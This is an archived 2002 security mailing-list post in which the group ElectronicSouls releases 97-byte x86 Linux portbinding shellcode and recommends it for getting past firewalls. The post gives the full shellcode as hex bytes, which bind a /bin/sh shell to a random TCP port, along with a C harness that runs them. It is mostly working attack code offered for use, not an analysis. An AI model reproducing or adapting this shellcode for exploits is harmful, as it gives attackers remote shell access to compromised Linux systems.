lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211290645.gAT6jdhY052012@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Advanced Linux Shellcode

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have pioneered a new shellcoding style for Linux.  What our shellcode does is your typical "portbinding", but we take it to the next level as we have it bind to a random port.  This is useful for traversing firewalls.

# cat  random-portbind.c
/* (C) roc - [ElectronicSouls]
 * x86 Linux 97 bytes portbinding shellcode
 *
 *  This shellcode binds to a random port so if used
 *   in remote/local(dont know why you'd want to use
 *   it locally) you will have to nmap your target
 *   to find what shell the port is on.
 *
 *
 */

unsigned char shellcode[] = "\x31\xdb\x31\xc9\xf7\xe3\x52\x43"
                            "\x53\x43\x53\x89\xe1\x4b\xb0\x66"
                            "\xcd\x80\x89\xc6\x43\x52\x66\x52"
                            "\x66\x53\x89\xe7\x6a\x10\x57\x50"
                            "\x89\xe1\xb0\x66\xcd\x80\x42\x52"
                            "\x56\x89\xe1\x43\x43\xb0\x66\xcd"
                            "\x80\x4a\x52\x52\x56\x43\x89\xe1"
                            "\xb0\x66\xcd\x80\x31\xc9\x89\xc3"
                            "\x83\xf9\x03\x73\x07\xb0\x3f\xcd"
                            "\x80\x41\xeb\xf4\x52\x68\x6e\x2f"
                            "\x73\x68\x68\x2f\x2f\x62\x69\x89"
                            "\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
                            "\x80";

int main() {
 /* modified from lamagra's execute chroot shellcode */
  int (*funct)();
  funct = (int (*)()) shellcode;
  printf("size = %d\n",strlen(shellcode));
  (int)(*funct)();

 }

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"r(t) = (a cos(t))*i+(a sin(t))*j+btk"
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nDSIMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlttHsAn3DKfBczfovn
k/cOxAMoPW1acMuDAJ4r+dSksqHRj8gWbBZYLfv+7YUNHg==
=YRf9
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ